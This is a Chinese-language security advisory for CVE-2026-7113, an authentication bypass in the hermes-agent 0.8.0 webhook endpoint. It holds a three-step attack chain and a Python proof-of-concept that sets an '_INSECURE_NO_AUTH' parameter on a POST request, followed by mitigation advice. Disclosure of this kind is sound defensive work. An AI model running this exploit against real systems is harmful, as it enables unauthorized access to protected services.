CVE-2026-7113：NousResearch hermes-agent身份验证缺失漏洞

漏洞信息

漏洞编号

CVE-2026-7113

漏洞类型

身份验证缺失

CVSS评分

5.6 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NousResearch hermes-agent

漏洞概述

NousResearch hermes-agent 0.8.0版本的Webhook组件存在严重的安全隐患，被归类为身份验证缺失漏洞（CVE-2026-7113）。该漏洞源于`gateway/platforms/webhook.py`文件中对特定参数的处理逻辑错误。攻击者可以通过操控请求中的`_INSECURE_NO_AUTH`参数，在不提供任何凭证的情况下绕过身份验证机制，从而远程访问受保护的端点。尽管该漏洞的利用复杂度较高，但已有公开的概念验证代码。项目方虽已收到修复建议，但截至目前尚未采取行动，用户需保持警惕。

技术细节

该漏洞的技术根源在于NousResearch hermes-agent处理Webhook请求时的逻辑缺陷。具体而言，受影响文件`gateway/platforms/webhook.py`中的Webhooks Endpoint组件未能安全地处理`_INSECURE_NO_AUTH`参数。在正常业务流程中，Webhook端点应强制要求客户端进行身份验证，以确保数据来源的可信度。然而，当攻击者在HTTP请求中注入或修改`_INSECURE_NO_AUTH`参数时，应用程序会错误地触发“不安全模式”，导致后续的身份验证检查被跳过。根据CVSS v3.1向量（CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L），该漏洞可被远程无特权的攻击者利用，无需用户交互。攻击复杂度被标记为“高”（AC:H），意味着利用可能需要特定的条件或时序，但并非不可行。成功利用后，攻击者可获得部分读取权限（C:L）、部分修改权限（I:L）并可能影响部分服务的可用性（A:L）。鉴于该漏洞已被集成到Metasploit等渗透测试框架中，潜在的自动化攻击风险正在增加。

攻击链分析

STEP 1

侦察与发现

攻击者扫描网络，识别出运行NousResearch hermes-agent 0.8.0版本的目标服务器，并确认Webhook端点的暴露情况。

STEP 2

参数操控

攻击者构造恶意的HTTP POST请求，向目标Webhook端点发送包含`_INSECURE_NO_AUTH`参数的数据包，该参数被设置为真值以触发逻辑缺陷。

STEP 3

身份验证绕过

服务器端接收到请求后，由于处理逻辑错误，直接跳过了身份验证流程，允许攻击者在未提供凭证的情况下执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: NousResearch hermes-agent 0.8.0 - Authentication Bypass via _INSECURE_NO_AUTH
# Description: This script demonstrates how to bypass authentication by setting the _INSECURE_NO_AUTH parameter.

TARGET_URL = "http://target-ip:port/webhook-endpoint"
PAYLOAD = {
    "data": "malicious_payload",
    "_INSECURE_NO_AUTH": "true"  # Setting this parameter skips authentication
}

def exploit():
    try:
        print("[*] Sending exploit request to %s" % TARGET_URL)
        response = requests.post(TARGET_URL, json=PAYLOAD, timeout=10)
        
        if response.status_code == 200:
            print("[+] Exploit successful! Authentication bypassed.")
            print("[+] Response: %s" % response.text)
        else:
            print("[-] Exploit failed. Status code: %d" % response.status_code)
    except Exception as e:
        print("[-] Error: %s" % str(e))

if __name__ == "__main__":
    exploit()

影响范围

NousResearch hermes-agent 0.8.0

防御指南

临时缓解措施

建议立即通过网络访问控制列表（ACL）限制对Webhook接口的访问，仅允许必要的IP地址连接。同时，应监控服务器日志，检查是否存在包含`_INSECURE_NO_AUTH`参数的异常请求记录，以判断是否已被攻击。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7113
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7113
3 Details https://www.cvedetails.com/cve/CVE-2026-7113/
4 VulDB https://vuldb.com/cve/CVE-2026-7113
5 Link https://github.com/NousResearch/hermes-agent/
6 Link https://github.com/NousResearch/hermes-agent/issues/6440
7 Link https://github.com/NousResearch/hermes-agent/pull/6445
8 Link https://vuldb.com/submit/800802
9 Link https://vuldb.com/vuln/359713
10 Link https://vuldb.com/vuln/359713/cti